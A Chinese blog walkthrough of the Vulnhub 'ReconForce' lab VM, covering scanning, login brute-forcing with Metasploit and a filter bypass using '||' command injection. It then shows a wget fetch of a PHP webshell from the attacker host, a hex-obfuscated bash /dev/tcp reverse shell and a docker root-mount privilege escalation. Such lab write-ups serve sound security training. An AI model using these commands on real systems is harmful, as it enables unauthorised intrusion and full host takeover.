【Vulnhub】靶机ReconForce

前言

  • Vulnhub刷题简单记录

ReconForce

描述

良好的枚举技巧

难度:容易中级

Flag: 2 标记第一个用户和第二个根用户

学习:Web 应用程序 | 枚举 | 权限提升

ReconForce开始

1、可以用两种方法确认靶场的存在,扫ip

1
2
netdiscover -i eth0 -r 192.168.56.0/24
nmap -sn 192.168.56.0/24

2、扫目标端口开发情况

1
2
nmap -sV -sC 192.168.56.108 -oA R
./nmapAutomator.sh -H 192.168.56.108 -t recon

3、访问主页,爆破目录,指定扫描php

1
2
3
4
5
gobuster dir -u http://192.168.56.106 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x php

dirb http://192.168.56.108/

dirsearch http://192.168.56.108/ -e* -x 403 -r

4、没有扫出什么,登陆ftp端口发现有用户Security@hackNos

image-20210926104813010

5、在登陆页面尝试爆破,用收集来的信息

1
2
3
word=["Recon","Security","hackNos","5ecure"]
for i in word:
print(i+"@hackNos")

输出

1
2
3
4
Recon@hackNos
Security@hackNos
hackNos@hackNos
5ecure@hackNos

练习一下msf的auth验证模块爆破登陆

1
2
3
4
5
6
7
8
use auxiliary/scanner/http/http_login
options
set AUTH_URI /5ecure/
set STOP_ON_SUCCESS YES
options
set PASS_FILE /root/BC/R/pass
options
set rhosts 192.168.56.108

image-20210926104955430

接着登陆利用||的特性来进行命令执行(特性是前面的命令执行失败,再执行后面的命令)

image-20210926105029720

明显命令执行漏洞,接着用wget上传木马

image-20210926105047222

这是cat查看的过滤规则,所以正常的反弹会失败

1
2
3
4
5
6
7
8
9
10
11
12
// Set blacklist
$substitutions = array(
'&' => '',
';' => '',
'| ' => '',
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);

给他上传一个一句话木马

1
|| wget http://192.168.56.1:8000/shell.php

接着反弹shell,骚姿势

1
echo "62617368202d6920263e2f6465762f7463702f3139322e3136382e35362e312f3132333420303e2631" |xxd -r -p|bash

拿到shell之后,为了防止乱码,可以使用ctrl+Z,然后再使用下面命令

1
2
stty raw -echo
nc -lvvp 1234 #返回终端

查看etc/passwd,发现有两个bash用户

还有一个recon,可以试试刚刚登陆的密码,或者爆破一下,发现可以登录

image-20210926111955675

接着发现recon用户可以直接提权

image-20210926112127348

方法二

docker提权

1
2
3
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
docker images
docker run -it -v /:/mbt ae7952123bc6 #加载这台主机的根目录

我的个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【Vulnhub】靶机ReconForce

文章作者:孤桜懶契

发布时间:2021年09月26日 - 10:11:01

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/158.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------